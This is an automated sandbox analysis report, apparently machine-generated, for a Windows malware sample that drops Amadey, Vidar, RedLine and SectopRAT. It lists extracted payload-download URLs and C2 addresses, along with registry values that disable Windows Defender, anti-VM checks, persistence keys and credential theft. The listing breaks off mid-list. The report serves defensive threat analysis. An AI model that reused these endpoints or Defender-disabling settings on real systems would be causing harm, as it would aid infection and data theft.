Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-02-2025 17:55
Static task
static1
Behavioral task
behavioral1
Sample
dfb3dd74837e1f931c4456bd18eb5a8d.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dfb3dd74837e1f931c4456bd18eb5a8d.exe
Resource
win10v2004-20250217-en
General
-
Target
dfb3dd74837e1f931c4456bd18eb5a8d.exe
-
Size
2.0MB
-
MD5
dfb3dd74837e1f931c4456bd18eb5a8d
-
SHA1
51dd5849ef9ca1779d755ba5596691ea9a539bab
-
SHA256
e7824fff5b683ad4df57bdc846e3763a507b76c3bfb369325f6ee117f6bf23f0
-
SHA512
23e32188f617c067bec46d00c4be97af76253a2962be1defb7c17d074d0fb4c98865f2fcf8f78ece729d30996f64fe3414610c2d5dcc5dcc1f48f4ce765dd550
-
SSDEEP
49152:mT6dCGskIPZMTwxw1j5Qb2MBPeIKQIcF3E1Wu4T1u:u6dCWVwxkj2bF19XlV1
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
redline
cheat
103.84.89.222:33791
Signatures
-
Amadey family
-
Detect Vidar Stealer 13 IoCs
resource yara_rule behavioral1/memory/2636-393-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-389-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-386-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-382-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-384-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-586-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-605-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-626-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-656-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-746-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-768-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-765-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2636-823-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/408-78-0x0000000000FD0000-0x0000000001412000-memory.dmp healer behavioral1/memory/408-79-0x0000000000FD0000-0x0000000001412000-memory.dmp healer behavioral1/memory/408-292-0x0000000000FD0000-0x0000000001412000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/3292-1465-0x0000000000A20000-0x0000000000E98000-memory.dmp family_sectoprat behavioral1/memory/3292-1464-0x0000000000A20000-0x0000000000E98000-memory.dmp family_sectoprat -
Sectoprat family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 17 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 53a344ac15.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dfb3dd74837e1f931c4456bd18eb5a8d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a6c78ad37e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ffa7544a13.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f00980bbe6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8e8b499a39.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 594ce90f45.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 09e3147b61.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9ed9551403.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a9b80795c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aadc92ce82.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f15c97f59b.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 19 600 powershell.exe 20 2840 powershell.exe 291 3544 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2840 powershell.exe 3544 powershell.exe 600 powershell.exe 3060 powershell.exe 2080 powershell.exe 1728 powershell.exe 2452 powershell.exe -
Downloads MZ/PE file 32 IoCs
flow pid Process 18 2848 skotes.exe 240 1216 BitLockerToGo.exe 269 2848 skotes.exe 269 2848 skotes.exe 320 3084 9ed9551403.exe 320 3084 9ed9551403.exe 320 3084 9ed9551403.exe 320 3084 9ed9551403.exe 320 3084 9ed9551403.exe 320 3084 9ed9551403.exe 27 2612 futors.exe 43 2612 futors.exe 291 3544 powershell.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 22 2848 skotes.exe 170 2912 BitLockerToGo.exe 271 3608 BitLockerToGo.exe 19 600 powershell.exe 20 2840 powershell.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2252 chrome.exe 3492 chrome.exe 2940 chrome.exe 4092 chrome.exe 2364 chrome.exe 4084 chrome.exe 4056 chrome.exe 2928 chrome.exe -
Checks BIOS information in registry 2 TTPs 34 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dfb3dd74837e1f931c4456bd18eb5a8d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8e8b499a39.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dfb3dd74837e1f931c4456bd18eb5a8d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a9b80795c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a6c78ad37e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ffa7544a13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a6c78ad37e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 09e3147b61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9ed9551403.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f15c97f59b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 594ce90f45.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aadc92ce82.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8e8b499a39.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 09e3147b61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ffa7544a13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 53a344ac15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 53a344ac15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f00980bbe6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aadc92ce82.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f15c97f59b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a9b80795c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 594ce90f45.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9ed9551403.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f00980bbe6.exe -
Executes dropped EXE 40 IoCs
pid Process 2848 skotes.exe 680 1c37375b51.exe 408 TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE 2324 amnew.exe 2612 futors.exe 2252 Bjkm5hE.exe 2868 Bjkm5hE.exe 2896 Bjkm5hE.exe 2044 Bjkm5hE.exe 2660 Bjkm5hE.exe 1416 483d2fa8a0d53818306efeb32d3.exe 288 f97a89268c.exe 1764 Ta3ZyUR.exe 2800 Ta3ZyUR.exe 2572 Ta3ZyUR.exe 2648 Ta3ZyUR.exe 1560 7aencsM.exe 2576 7aencsM.exe 2636 7aencsM.exe 3564 a9b80795c6.exe 3820 DTQCxXZ.exe 1600 qFqSpAp.exe 3572 f6ed024c22.exe 3372 630ddb0de3.exe 2336 d2YQIJa.exe 1572 jROrnzx.exe 3080 jROrnzx.exe 3456 aadc92ce82.exe 4060 8e8b499a39.exe 3700 594ce90f45.exe 3292 a6c78ad37e.exe 3624 09e3147b61.exe 3084 9ed9551403.exe 3848 5daa0a45e0.exe 3852 484976ff5a.exe 2020 Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE 2372 ffa7544a13.exe 1996 53a344ac15.exe 3744 f00980bbe6.exe 2924 f15c97f59b.exe -
Identifies Wine through registry keys 2 TTPs 17 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 8e8b499a39.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 09e3147b61.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 9ed9551403.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine aadc92ce82.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 594ce90f45.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine a6c78ad37e.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine dfb3dd74837e1f931c4456bd18eb5a8d.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 53a344ac15.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine f00980bbe6.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine f15c97f59b.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine a9b80795c6.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine ffa7544a13.exe -
Loads dropped DLL 64 IoCs
pid Process 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 2848 skotes.exe 600 powershell.exe 600 powershell.exe 2848 skotes.exe 2324 amnew.exe 2848 skotes.exe 2848 skotes.exe 2252 Bjkm5hE.exe 2252 Bjkm5hE.exe 2252 Bjkm5hE.exe 2252 Bjkm5hE.exe 2928 WerFault.exe 2928 WerFault.exe 2928 WerFault.exe 2840 powershell.exe 2840 powershell.exe 2612 futors.exe 2848 skotes.exe 1764 Ta3ZyUR.exe 1764 Ta3ZyUR.exe 1764 Ta3ZyUR.exe 2444 WerFault.exe 2444 WerFault.exe 2444 WerFault.exe 2444 WerFault.exe 2444 WerFault.exe 2848 skotes.exe 1560 7aencsM.exe 1560 7aencsM.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 2612 futors.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe 1572 jROrnzx.exe 3380 WerFault.exe 3380 WerFault.exe 3380 WerFault.exe 3380 WerFault.exe 3380 WerFault.exe 2912 BitLockerToGo.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe 2848 skotes.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\5daa0a45e0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086066001\\5daa0a45e0.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\484976ff5a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086067001\\484976ff5a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\1c37375b51.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085971101\\1c37375b51.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085972021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\f97a89268c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10007520101\\f97a89268c.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\a9b80795c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10007530101\\a9b80795c6.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\09e3147b61.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086064001\\09e3147b61.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\9ed9551403.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086065001\\9ed9551403.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 f15c97f59b.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000016210-36.dat autoit_exe behavioral1/files/0x000600000001904c-242.dat autoit_exe behavioral1/files/0x000500000001d700-2033.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 2848 skotes.exe 408 TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE 1416 483d2fa8a0d53818306efeb32d3.exe 3564 a9b80795c6.exe 2336 d2YQIJa.exe 3456 aadc92ce82.exe 4060 8e8b499a39.exe 3700 594ce90f45.exe 3292 a6c78ad37e.exe 3624 09e3147b61.exe 3084 9ed9551403.exe 2020 Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE 2372 ffa7544a13.exe 1996 53a344ac15.exe 3744 f00980bbe6.exe 2924 f15c97f59b.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 2252 set thread context of 2660 2252 Bjkm5hE.exe 62 PID 1764 set thread context of 2648 1764 Ta3ZyUR.exe 75 PID 1560 set thread context of 2636 1560 7aencsM.exe 93 PID 3564 set thread context of 2912 3564 a9b80795c6.exe 117 PID 1572 set thread context of 3080 1572 jROrnzx.exe 127 PID 3456 set thread context of 1216 3456 aadc92ce82.exe 131 PID 3372 set thread context of 3856 3372 630ddb0de3.exe 133 PID 4060 set thread context of 3608 4060 8e8b499a39.exe 137 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job dfb3dd74837e1f931c4456bd18eb5a8d.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 2928 2252 WerFault.exe 58 2444 1764 WerFault.exe 72 408 1560 WerFault.exe 91 1764 1600 WerFault.exe 114 3380 1572 WerFault.exe 125 3368 2372 WerFault.exe 182 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9ed9551403.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e8b499a39.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 594ce90f45.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5daa0a45e0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a6c78ad37e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f97a89268c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 484976ff5a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 53a344ac15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage f97a89268c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aadc92ce82.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 5daa0a45e0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a9b80795c6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 5daa0a45e0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 630ddb0de3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ffa7544a13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language f97a89268c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1c37375b51.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 